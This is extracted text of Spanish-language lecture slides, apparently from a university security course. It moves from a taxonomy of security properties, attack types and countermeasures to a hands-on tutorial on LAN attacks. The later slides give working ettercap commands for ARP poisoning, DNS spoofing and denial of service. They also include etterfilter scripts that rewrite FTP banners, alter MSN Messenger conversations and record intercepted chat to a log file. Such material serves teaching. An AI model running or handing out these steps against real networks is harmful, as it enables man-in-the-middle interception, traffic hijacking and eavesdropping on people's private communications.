Documente Academic
Documente Profesional
Documente Cultură
de Ingeniería y Tecnología
2
Seguridad
Propiedades de la Seguridad
Informatica
Confidencialidad
Integridad
Disponibilidad
Estados de la Informacion
Procesamiento
Almacenamiento
Transmision
Medidas de Seguridad
Politicas y Procedimientos
Tecnologia
Integridad
Disponibilidad
Politicas y Procedimientos
Tecnologia
Educacion, Entrenamiento, y
Conocimiento
Administracion de Riesgos
Ataques de acceso
Explotar vulnerabilidades conocidas en servicios de autenticación,
FTP y web para ganar acceso a cuentas web, bases de datos
confidenciales y otra información sensible.
9
Ataques de Reconocimiento
•Sniffers de paquetes
•Barridos de ping
•Escaneo de puertos
•Búsquedas de información en
Internet
10
Ataques de Acceso
•Ataques de contraseña
•Explotación de la confianza
•Redirección de puerto
•Ataque Man in the Middle
•Desbordamiento de buffer
11
Ataques de DoS
•SYN Flood Attack
•Teardrop Attacks
•Smurf Attack
•DNS Attacks
•Email Attacks
•Physical Infrastructure
Attacks
•Viruses/Worms
12
Ataques Especificos de Red
ARP Attack
Brute Force Attack
Worms
Flooding
Sniffers
Spoofing
Redirected Attacks
Tunneling Attack
Covert Channels
Etapas de un ataque
Hoy en dia los atacantes tienen gran cantidad de
blancos de ataque. Su gran desafio es seleccionar las
victimas mas vulnerables. Para esto realizan ataques
muy bien planeados y estructurados. Estos ataques
tienen etapas logisticas y estrategicas comunes:
Reconocimiento
Exploracion (direcciones, puertos, vulnerabilidades)
Ganar acceso
Mantener Acceso
Cubrir Pistas
Contramedidas
DMZ/NAT
IDS/IPS
Content Filtering/NAC
Firewalls/proxy services
Authentication/Authorization/Accounting
Self-defending networks
Policies, procedures, standards guidelines
Training and awareness
Ataques En Redes LAN
La seguridad en Redes LAN es muchas veces
inexistente y para probarlo se describen los
pasos necesarios para realizar algunos ataques
en redes de area local.
Escenario Una red de area local (LAN) equipos
interconectados mediante dispositivos de
networking como ser concentradores (HUBs) o
encaminadores (switch). El equipo atacante
tiene que estar en la misma red que el equipo
victima.
16
Envenenamiento ARP
Lanzar ataque:
root@bt#ettercap -T -q -i eth0 -M arp:remote
MAC/IP/PUERTO MAC/IP/PUERTO
Donde:
- T : modo Texto
- q : quiet(No hace ruido) no muestra todo lo que
captura solo lo importante.
- i : Eleccion de la interfaz
- M : Metodo arp
17
Envenenamiento ARP
Envenenamiento ARP
Envenenamiento ARP
Envenenamiento ARP
21
Envenenamiento ARP
22
Envenenamiento ARP
23
Envenenamiento ARP
24
DNS Spoof
1. Editar archivo de conguracion DNS
/usr/share/ettercap/etter.dns
dominio A direccion-ip
25
DNS Spoof
2. Lanzar el Ataque:
root@bt#ettercap -T -q -i eth0 -P dns spoof -M
arp:remote MAC/IP/PUERTO MAC/IP/PUERTO
- T : modo Texo
- q : quiet(No hace ruido) no muestra todo lo que
captura solo lo importante.
- i : Eleccion de la interfaz
- P : Activa el plugin dns spoof(previa conguracion)
- M : Metodo arp
- P : Activa el plugin dns spoof
D.O.S Denial of Service -Denegacion
de Servicio
1. Lanzar ataque:
root@bt#ettercap -T -q -i eth0 -P dos attack -M arp:remote
MAC/IP/PUERTO MAC/IP/PUERTO
- T : modo Texo
- q : quiet(No hace ruido) no muestra todo lo que captura
solo lo importante.
- i : Eleccion de la interfaz
- M : Metodo arp
- P : Activa el plugin dos attack
2. Asignar valores
Insert victim IP: ip de la victima.
Insert unused IP: ip a donde direccionar el trafico.
28
Denegacion de Servicio
30
Denegacion de Servicio
31
Cambio de datos
1. Crear el filtro de cambio
Archivo banner
---------------------------------------------
# replace the FTP prompt por SSH
if (tcp.src == 21) {
replace("FTP","SSH");
}
---------------------------------------------
2. compilar:
root@bt#etterfilter banner -o banner.ef
3. Ejecutar el filtro + envenamiento ARP
root@bt#ettercap -T -q -i eth0 -F banner.ef -M arp:remote
MAC/IP/PUERTO MAC/IP/PUERTO
32
Alteracion de Conversaciones
(Caso MSN Messenger)
1. Crear el filtro de cambio
Archivo msn
-------------------------------------------------
34
Alteracion de Conversaciones
(Caso MSN Messenger)
2. compilar:
root@bt#etterfilter msn -o msn.ef
3. Ejecutar el filtro + envenamiento ARP
root@bt#ettercap -T -q -i eth0 -F msn.ef -M
arp:remote MAC/IP/PUERTO MAC/IP/PUERTO
35
Grabar Chat
1. Crear el filtro de guardar conversaciones
Archivo ver chat
--------------------------------------------------
if (tcp.src == 1863 || tcp.dst == 1863) {
log(DATA.data, "/tmp/msn.log");
msg("Texto plano MSN Guardado!XD\n");
}
--------------------------------------------------
37
Grabar Chat
2. compilar:
root@bt#etterfilter verchar -o verchat.ef
3. Ejecutar el filtro + envenamiento ARP
root@bt#ettercap -T -q -i eth0 -F verchat.ef -M
arp:remote MAC/IP/PUERTO MAC/IP/PUERTO
4. Revisar el archivo /tmp/msn.log
38